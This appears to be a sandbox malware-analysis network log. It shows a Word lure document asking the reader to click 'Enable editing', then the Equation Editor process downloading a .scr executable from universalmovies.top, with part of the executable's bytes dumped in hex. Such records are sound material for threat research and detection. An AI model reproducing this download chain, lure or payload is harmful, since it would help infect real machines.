                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 70 72 6f 6d 70 74 20 63 6f 6e 74 69 6e 75 65 64 20 6d 6f 6e 69 74 6f 72 69 6e 67 20 62 79 20 6d 61 6e 61 67 65 6d 65 6e 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 2e 44 75 72 69 6e 67 20 74 68 65 20 63 6f 75 72 73 65 20 6f 66 20 61 6e 20 61 75 64 69 74 2c 20 74 68 65 20 61 75 64 69 74 6f 72 73 20 6d 69 67 68 74 20 61 6c 73 6f 20 69 64 65 6e 74 69 66 79 20 6f 74 68 65 72 20 6d 61 74 74 65 72 73 20 74 68 61 74 20 61 72 65 6e 92 74 20 63 6f 6e 73 69 64 65 72 65 64 20 64 65 66 69 63 69 65 6e 63 69 65 73 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 2c 20 62 75 74 20 61 72 65 20 6f 70 70 6f 72 74 75 6e 69 74 69 65 73 20 66 6f 72 20 73 74 72 65 6e 67 74 68 65 6e 69 6e 67 20 70 72 6f 63 65
                                                                              Data Ascii: prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that arent considered deficiencies in internal control, but are opportunities for strengthening proce
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 77 69 74 68 20 76 61 6c 75 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 2e 20 55 73 65 64 20 70 72 6f 70 65 72 6c 79 2c 20 74 68 65 20 4d 61 6e 61 67 65 6d 65 6e 74 20 4c 65 74 74 65 72 20 63 61 6e 20 62 65 20 61 20 62 65 6e 65 66 69 63 69 61 6c 20 74 6f 6f 6c 20 66 6f 72 20 61 73 73 69 73 74 69 6e 67 20 6d 61 6e 61 67 65 6d 65 6e 74 20 6f 72 20 74 68 6f 73 65 20 63 68 61 72 67 65 64 20 77 69 74 68 20 67 6f 76 65 72 6e 61 6e 63 65 20 69 6e 20 66 75 6c 66 69 6c 6c 69 6e 67 20 74 68 65 69 72 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 69 65 73 25 34 34 25 36 46 25 36 33 25 37 35 25 36 44 25 36 35 25 36
                                                                              Data Ascii: harged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 25 36 43 25 32 30 25 36 39 25 36 45 25 37 34 25 36 35 25 37 32 25 36 31 25 36 33 25 37 34 25 36 39 25 36 46 25 36 45 25 37 33 25 32 30 25 37 34 25 36 46 25 32 30 25 37 30 25 37 32 25 36 46 25 36 44 25 36 46 25 37 34 25 36 35 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 37 30 25 37 32 25 36 46 25 36 34 25 37 35 25 36 33 25 37 34 25 37 33 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 37 33 25 36 35 25 37 32 25 37 36 25 36 39 25 36 33 25 36 35 25 37 33 25 32 45 25 32 30 25 34 37 25 37 35 25 36 35 25 37 32 25 36 39 25 36 43 25 36 43 25 36 31 25 32 30 25 36 44 25 36 31 25 37 32 25 36 42 25 36 35 25 37 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 33 25 37 34 25 37 32 25 36 31 25 37 34 25 36 35 25 36 37 25 37 39 25 32 30 25 36 39 25 37 33 25 32 30 25 37 30
                                                                              Data Ascii: %6C%20%69%6E%74%65%72%61%63%74%69%6F%6E%73%20%74%6F%20%70%72%6F%6D%6F%74%65%20%74%68%65%20%70%72%6F%64%75%63%74%73%20%61%6E%64%20%73%65%72%76%69%63%65%73%2E%20%47%75%65%72%69%6C%6C%61%20%6D%61%72%6B%65%74%69%6E%67%20%73%74%72%61%74%65%67%79%20%69%73%20%70
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 36 35 25 37 32 25 37 33 25 37 34 25 36 31 25 36 45 25 36 34 25 36 39 25 36 45 25 36 37 25 32 30 25 37 34 25 36 38 25 36 35 25 32 30 25 36 33 25 37 35 25 37 33 25 37 34 25 36 46 25 36 44 25 36 35 25 37 32 25 32 37 25 37 33 25 32 30 25 37 30 25 37 32 25 36 39 25 36 33 25 36 35 25 32 30 25 36 31 25 36 45 25 36 34 25 32 30 25 36 32 25 36 43 25 36 43 25 32 30 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73 92 20 6f 70 69 6e 69 6f 6e 20 73 61 79 73 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 61 72 65 20 66 61 69 72 6c 79 20 73 74 61 74 65 64 20
                                                                              Data Ascii: 65%72%73%74%61%6E%64%69%6E%67%20%74%68%65%20%63%75%73%74%6F%6D%65%72%27%73%20%70%72%69%63%65%20%61%6E%64%20%62%6C%6C%20please click Enable editing from the yellow bar above.The independent auditors opinion says the financial statements are fairly stated
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 6e 73 69 64 65 72 65 64 20 74 6f 20 62 65 20 64 65 66 69 63 69 65 6e 74 2e 41 75 64 69 74 6f 72 73 20 65 76 61 6c 75 61 74 65 20 65 61 63 68 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 64 65 66 69 63 69 65 6e 63 79 20 6e 6f 74 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 64 69 74 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 65 74 68 65 72 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 2c 20 6f 72 20 61 20 63 6f 6d 62 69 6e 61 74 69 6f 6e 20 6f 66 20 64 65 66 69 63 69 65 6e 63 69 65 73 2c 20 69 73 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 63 6f 6e 73 69 64 65 72 65 64 20 61 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 20 6f 72 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 79 2e 20 49 6e 20 61
                                                                              Data Ascii: nsidered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In a
                                                                              2024-06-25 13:13:54 UTC1369INData Raw: 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 6f 66 74 65 6e 20 66 69 6e 64 20 69 74 20 63 6f 73 74 20 70 72 6f 68 69 62 69 74 69 76 65 20 74 6f 20 72 65 6d 65 64 79 20 74 68 65 20 64 65 66 69 63 69 65 6e 63 79 20 62 79 20 74 72 61 69 6e 69 6e 67 20 63 75 72 72 65 6e 74 20 65 6d 70 6c 6f 79 65 65 73 20 6f 72 20 62 79 20 68 69 72 69 6e 67 20 61 64 64 69 74 69 6f 6e 61 6c 20 65 6d 70 6c 6f 79 65 65 73 20 6f 72 20 61 6e 6f 74 68 65 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 74 6f 20 70 72 65 70 61 72 65 20 74 68 65 6d 2e 20 4e 6f 6e 70 72 6f 66 69 74 73 20 6d 61 79 20 6f 70 74 20 74 6f 20 64 6f 63 75 6d 65 6e 74 20 74 68 65 69 72 20 65 78 70 6c 61 6e 61 74 69 6f 6e 20 76 69 61 20 61 20 4d 61 6e 61 67 65 6d 65 6e 74 20 52 65 73
                                                                              Data Ascii: financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Res


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.2249172172.67.162.954432732C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:55 UTC147OUTHEAD /nelb.doc HTTP/1.1
                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                              Host: universalmovies.top
                                                                              Content-Length: 0
                                                                              Connection: Keep-Alive
                                                                              2024-06-25 13:13:55 UTC841INHTTP/1.1 200 OK
                                                                              Date: Tue, 25 Jun 2024 13:13:55 GMT
                                                                              Content-Type: application/msword
                                                                              Content-Length: 574773
                                                                              Connection: close
                                                                              Last-Modified: Tue, 25 Jun 2024 07:45:34 GMT
                                                                              ETag: "667a759e-8c535"
                                                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                              Cache-Control: max-age=315360000
                                                                              CF-Cache-Status: HIT
                                                                              Age: 18284
                                                                              Accept-Ranges: bytes
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BVkqvddtwXlnc7mRb3iMC5FQmDWSUPWPCNHp1hH%2FI3rgo5uXDCQh6BQ0xqdpAAHtzHjOiNjDIesEuGTpQdY%2B0Wv4E1ZoOl3hk2coaQeYIx6P6sO6M2gar7MYmeqI4PwrgrZuM%2Fg"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537ba4cebc425-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.2249173104.21.74.1914433156C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:13:56 UTC314OUTGET /nelb.scr HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                              Host: universalmovies.top
                                                                              Connection: Keep-Alive
                                                                              2024-06-25 13:13:56 UTC771INHTTP/1.1 200 OK
                                                                              Date: Tue, 25 Jun 2024 13:13:56 GMT
                                                                              Content-Type: application/x-silverlight
                                                                              Content-Length: 628736
                                                                              Connection: close
                                                                              Last-Modified: Tue, 25 Jun 2024 07:42:57 GMT
                                                                              ETag: "99800-61bb20bd72002"
                                                                              Accept-Ranges: bytes
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cn9vdpokojka9zBITaXz2mLVj6t31YIFN1zV1V%2BbVD2fNU83GM1ouR8KR78wA8gEWURMH9mukO8174d1ivi7mX4%2FjwUaeItskRH0Q53sJmTo%2F4zBHahOGbfVFle4sLkh2r2%2BWMpR"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537c10e1a0f37-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:13:56 UTC598INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 53 b9 1c d9 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8e 09 00 00 08 00 00 00 00 00 00 be ac 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELS0 @ @
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 0a 00 00 2a 22 00 02 80 02 00 00 04 2a 22 02 28 1b 00 00 0a 00 2a 56 73 07 00 00 06 28 1c 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a 9e 02 14 7d 05 00 00 04 02 28 1d 00 00 0a 00 00 7e 35 00 00 04 74 4c 00 00 01 28 1e 00 00 0a 26 02 28 1b 00 00 06 00 2a 0a 00 2a 2e 28 05 00 00 06 80 04 00 00 04 2a 22 00 73 09 00 00 06 26 2a ca 72 85 03 00 70 80 34 00 00 04 28 3f 00 00 0a 28 25 00 00 06 6f 40 00 00 0a 6f 41 00 00 0a 1f 23 9a 80 35 00 00 04 00 28 42 00 00 0a 80 30 00 00 04 2a 92 02 1f 1f 7d 33 00 00 04 02 28 16 00 00 0a 00 00 02 02 7b 33 00 00 04 17 58 8d 08 00 00 02 7d 32 00 00 04 2a 7a 02 28 16 00 00 0a 00 00 02 03 7d 36 00 00 04 02 04 7d 37 00 00 04 02 05 7d 38 00 00 04 2a 46 02 7e 39 00 00 04 28 50 00 00 0a a5 63 00 00 01 2a 36 02 7e 39 00 00 04 03 28 51
                                                                              Data Ascii: *"*"(*Vs(t*}(~5tL(&(**.(*"s&*rp4(?(%o@oA#5(B0*}3({3X}2*z(}6}7}8*F~9(Pc*6~9(Q
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 2a 46 02 7e bc 00 00 04 28 50 00 00 0a a5 63 00 00 01 2a 36 02 7e bc 00 00 04 03 28 51 00 00 0a 2a 4e 02 74 15 00 00 02 25 14 7d c3 00 00 04 6f e4 00 00 0a 2a 62 28 00 01 00 0a 2c 0f 28 01 01 00 0a 16 31 07 02 28 78 00 00 0a 2a 16 2a 42 02 28 78 00 00 0a 2d 06 28 e1 00 00 06 2a 14 2a 22 02 03 28 f9 00 00 06 2a 46 02 7e c5 00 00 04 28 50 00 00 0a 74 14 00 00 01 2a 36 02 7e c5 00 00 04 03 28 52 00 00 0a 2a 46 02 7e c6 00 00 04 28 50 00 00 0a 74 14 00 00 01 2a 36 02 7e c6 00 00 04 03 28 52 00 00 0a 2a 46 02 7e c7 00 00 04 28 50 00 00 0a a5 63 00 00 01 2a 36 02 7e c7 00 00 04 03 28 51 00 00 0a 2a 46 02 7e c8 00 00 04 28 50 00 00 0a a5 63 00 00 01 2a 36 02 7e c8 00 00 04 03 28 51 00 00 0a 2a 46 02 7e c9 00 00 04 28 50 00 00 0a a5 09 00 00 1b 2a 4a 02 7e c9 00
                                                                              Data Ascii: *F~(Pc*6~(Q*Nt%}o*b(,(1(x**B(x-(**"(*F~(Pt*6~(R*F~(Pt*6~(R*F~(Pc*6~(Q*F~(Pc*6~(Q*F~(P*J~
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 00 00 04 72 5d 00 00 70 6f 2e 00 00 0a 00 02 7b 07 00 00 04 17 6f 2f 00 00 0a 00 02 7b 08 00 00 04 1f 10 1f 10 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 08 00 00 04 72 6d 00 00 70 6f 2a 00 00 0a 00 02 7b 08 00 00 04 1f 4b 1f 17 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 08 00 00 04 18 6f 2d 00 00 0a 00 02 7b 08 00 00 04 72 6d 00 00 70 6f 2e 00 00 0a 00 02 7b 08 00 00 04 17 6f 2f 00 00 0a 00 02 7b 08 00 00 04 02 fe 06 11 00 00 06 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 09 00 00 04 16 1f 48 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 09 00 00 04 72 7d 00 00 70 6f 2a 00 00 0a 00 02 7b 09 00 00 04 1f 4b 1f 17 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 09 00 00 04 19 6f 2d 00 00 0a 00 02 7b 09 00 00 04 72 7d 00 00 70 6f 2e 00 00 0a 00 02 7b 09 00 00 04 17 6f 2f 00 00 0a 00 02
                                                                              Data Ascii: r]po.{o/{s(o){rmpo*{Ks+o,{o-{rmpo.{o/{s0o1{Hs(o){r}po*{Ks+o,{o-{r}po.{o/
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 0a 00 02 7b 12 00 00 04 17 6f 2f 00 00 0a 00 02 7b 12 00 00 04 02 fe 06 0f 00 00 06 73 30 00 00 0a 6f 34 00 00 0a 00 02 7b 13 00 00 04 17 6f 32 00 00 0a 00 02 7b 13 00 00 04 1f 1b 20 a7 00 00 00 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 13 00 00 04 72 4f 01 00 70 6f 2a 00 00 0a 00 02 7b 13 00 00 04 1f 55 1f 11 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 13 00 00 04 1f 0d 6f 2d 00 00 0a 00 02 7b 13 00 00 04 17 6f 33 00 00 0a 00 02 7b 13 00 00 04 72 4f 01 00 70 6f 2e 00 00 0a 00 02 7b 13 00 00 04 17 6f 2f 00 00 0a 00 02 7b 14 00 00 04 17 6f 32 00 00 0a 00 02 7b 14 00 00 04 20 9e 00 00 00 1f 10 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 14 00 00 04 72 69 01 00 70 6f 2a 00 00 0a 00 02 7b 14 00 00 04 1f 55 1f 11 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 14 00 00 04 1f 0e 6f
                                                                              Data Ascii: {o/{s0o4{o2{ s(o){rOpo*{Us+o,{o-{o3{rOpo.{o/{o2{ s(o){ripo*{Us+o,{o
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 00 0a 6f 29 00 00 0a 00 02 7b 1d 00 00 04 72 41 02 00 70 6f 2a 00 00 0a 00 02 7b 1d 00 00 04 1f 64 1f 14 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 1d 00 00 04 1f 17 6f 2d 00 00 0a 00 02 7b 1e 00 00 04 20 d2 00 00 00 20 e8 00 00 00 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 1e 00 00 04 72 53 02 00 70 6f 2a 00 00 0a 00 02 7b 1e 00 00 04 1f 64 1f 14 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 1e 00 00 04 1f 18 6f 2d 00 00 0a 00 02 7b 1f 00 00 04 20 a0 00 00 00 20 e8 00 00 00 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 1f 00 00 04 72 65 02 00 70 6f 2a 00 00 0a 00 02 7b 1f 00 00 04 1f 64 1f 14 73 2b 00 00 0a 6f 2c 00 00 0a 00 02 7b 1f 00 00 04 1f 19 6f 2d 00 00 0a 00 02 7b 20 00 00 04 20 5a 01 00 00 20 0c 01 00 00 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 20 00 00 04 72 77 02 00
                                                                              Data Ascii: o){rApo*{ds+o,{o-{ s(o){rSpo*{ds+o,{o-{ s(o){repo*{ds+o,{o-{ Z s(o){ rw
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 02 7b 26 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 25 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 24 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 23 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 22 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 21 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 20 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1f 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1e 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1d 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1c 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1b 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 1a 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 19 00 00 04 6f 3b 00 00 0a 00 02 28 3a 00 00 0a 02 7b 18
                                                                              Data Ascii: {&o;(:{%o;(:{$o;(:{#o;(:{"o;(:{!o;(:{ o;(:{o;(:{o;(:{o;(:{o;(:{o;(:{o;(:{o;(:{
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 00 28 24 00 00 06 28 24 00 00 06 28 17 00 00 06 0a 06 0b 2b 00 07 2a 00 13 30 05 00 9c 01 00 00 00 00 00 00 72 a7 03 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 16 8c 63 00 00 01 1f 10 73 49 00 00 0a 28 4a 00 00 0a 80 39 00 00 04 72 bb 03 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 16 8c 63 00 00 01 1f 12 73 49 00 00 0a 28 4a 00 00 0a 80 3a 00 00 04 72 cf 03 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 17 8c 63 00 00 01 1f 12 73 49 00 00 0a 28 4a 00 00 0a 80 3b 00 00 04 72 e7 03 00 70 d0 02 00 00 1b 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 14 1f 10 73 49 00 00 0a 28 4a 00 00 0a 80 3c 00 00 04 72 03 04 00 70 d0 63 00 00 01 28 48 00 00 0a d0 09 00 00 02 28 48 00 00 0a 16 8c 63 00 00 01 1f
                                                                              Data Ascii: ($($(+*0rpc(H(HcsI(J9rpc(H(HcsI(J:rpc(H(HcsI(J;rp(H(HsI(J<rpc(H(Hc
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 7e 41 00 00 04 03 02 6f 74 00 00 0a de 0a 07 2c 06 06 28 72 00 00 0a dc 2a 00 00 01 10 00 00 02 00 08 00 23 2b 00 0a 00 00 00 00 13 30 04 00 42 00 00 00 13 00 00 11 02 28 32 00 00 06 17 33 2f 23 00 00 00 00 00 00 14 40 23 00 00 00 00 00 00 10 40 23 00 00 00 00 00 00 14 40 23 00 00 00 00 00 00 10 40 73 75 00 00 0a 73 76 00 00 0a 2a 12 00 fe 15 03 00 00 1b 06 2a 00 00 13 30 08 00 b8 12 00 00 14 00 00 11 02 28 77 00 00 0a 0a 02 28 32 00 00 06 16 fe 01 0b 02 28 2c 00 00 06 2c 08 02 28 78 00 00 0a 2b 01 16 25 2c 08 02 28 28 00 00 06 2b 01 16 0c 2c 08 02 28 2a 00 00 06 2b 01 16 0d 02 28 2e 00 00 06 13 04 12 04 28 79 00 00 0a 13 05 02 28 30 00 00 06 13 06 08 2d 0e 09 2d 0b 11 05 2d 07 11 06 16 fe 01 2b 01 16 13 07 1f 13 28 3e 00 00 06 07 39 88 00 00 00 12 0a fe
                                                                              Data Ascii: ~Aot,(r*#+0B(23/#@#@#@#@susv**0(w(2(,,(x+%,((+,(*+(.(y(0---+(>9
                                                                              2024-06-25 13:13:56 UTC1369INData Raw: 23 9a 99 99 99 99 99 d9 3f 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 bd 00 00 00 20 ed 00 00 00 20 ff 00 00 00 28 87 00 00 0a 23 9a 99 99 99 99 99 d9 3f 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 b7 00 00 00 20 e7 00 00 00 20 fb 00 00 00 28 87 00 00 0a 23 00 00 00 00 00 00 f0 3f 73 88 00 00 0a 6f 89 00 00 0a 38 cc 00 00 00 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 f2 00 00 00 20 f9 00 00 00 20 fc 00 00 00 28 87 00 00 0a 23 00 00 00 00 00 00 00 00 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 f2 00 00 00 20 f9 00 00 00 20 fc 00 00 00 28 87 00 00 0a 23 9a 99 99 99 99 99 d9 3f 73 88 00 00 0a 6f 89 00 00 0a 11 09 6f 86 00 00 0a 20 ff 00 00 00 20 e1 00 00 00 20 f1 00 00 00 20 f9 00 00 00
                                                                              Data Ascii: #?soo (#?soo (#?so8o (#soo (#?soo


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              8192.168.2.2249174172.67.162.95443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-25 13:14:01 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                                                              2024-06-25 13:14:01 UTC734INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Tue, 25 Jun 2024 13:14:01 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=agdJLl1InpF7eDH3JCmH2NZUDgJVCFu1P5R27hFY4BA%2B6j9TMC1iVWOMH6i5n0782FJ%2F20AfbhbpUhqsOXCkHZyn4r0D9M04kEi%2FLi9x2VI0UGU%2F09P5wdvpF7nFpfzuDzV9FO5x"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537dcebfa42db-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:14:01 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                              Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                                                              2024-06-25 13:14:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              9192.168.2.2249175172.67.162.95443
                                                                              TimestampBytes transferredDirectionData
